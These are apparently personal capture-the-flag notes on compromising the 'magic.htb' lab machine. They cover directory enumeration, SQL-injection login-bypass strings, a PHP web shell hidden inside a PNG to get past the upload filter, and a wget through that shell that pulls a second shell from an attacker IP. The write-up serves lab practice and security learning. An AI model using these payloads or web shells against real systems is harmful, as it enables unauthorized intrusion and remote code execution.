2 :80
http://magic.htb/
webpage with images
$ gobuster dir -u http://magic.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/assets (Status: 301) [Size: 307] [--> http://magic.htb/assets/]
/images (Status: 301) [Size: 307] [--> http://magic.htb/images/]
/index.php (Status: 200) [Size: 4052]
/login.php (Status: 200) [Size: 4221]
/upload.php (Status: 302) [Size: 2957] [--> login.php]
/logout.php (Status: 302) [Size: 0] [--> index.php]
http://magic.htb/login.php
login page
| ran sqli.txt
sucess with
'or1=1-- -:pass
admin' #:pass
http://magic.htb/upload.php
can upload images
# tried .php
Sorry, only JPG, JPEG, PNG files are allowed
# method1: changed content-type with burp to image/png -> FAILS
# method2: magic bytes .jpg with shell code and upload -> FAILS
# method3: magic bytes .jpg with shellcode and update content type in burp -> FAILS
Using https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html
# renaming with double extension >
$ cp /opt/imgs/5.png kashz.php.png
# using sublime changed the file type to ascii so >
# using vi I modified the image and put shell inside it in middle: <?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
$ file kashz.php.png
5.png: PNG image data, 263 x 277, 8-bit colormap, non-interlaced
# upload sucessful.
# based on the images on homepage, we can see path to uploaded images is magic.htb/images/uploads/<file>
magic.htb/images/uploads/kashz.php.png
# shows us garbled image-data
http://magic.htb/images/uploads/kashz.php.png?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
# web shell using
http://magic.htb/images/uploads/kashz.php.png?cmd=wget%2010.10.16.5/web.php
> http://magic.htb/images/uploads/web.php
CMD: whoami;id;hostname;uname -a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ubuntu
Linux ubuntu 5.3.0-42-generic #34~18.04.1-Ubuntu SMP Fri Feb 28 13:42:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
Last updated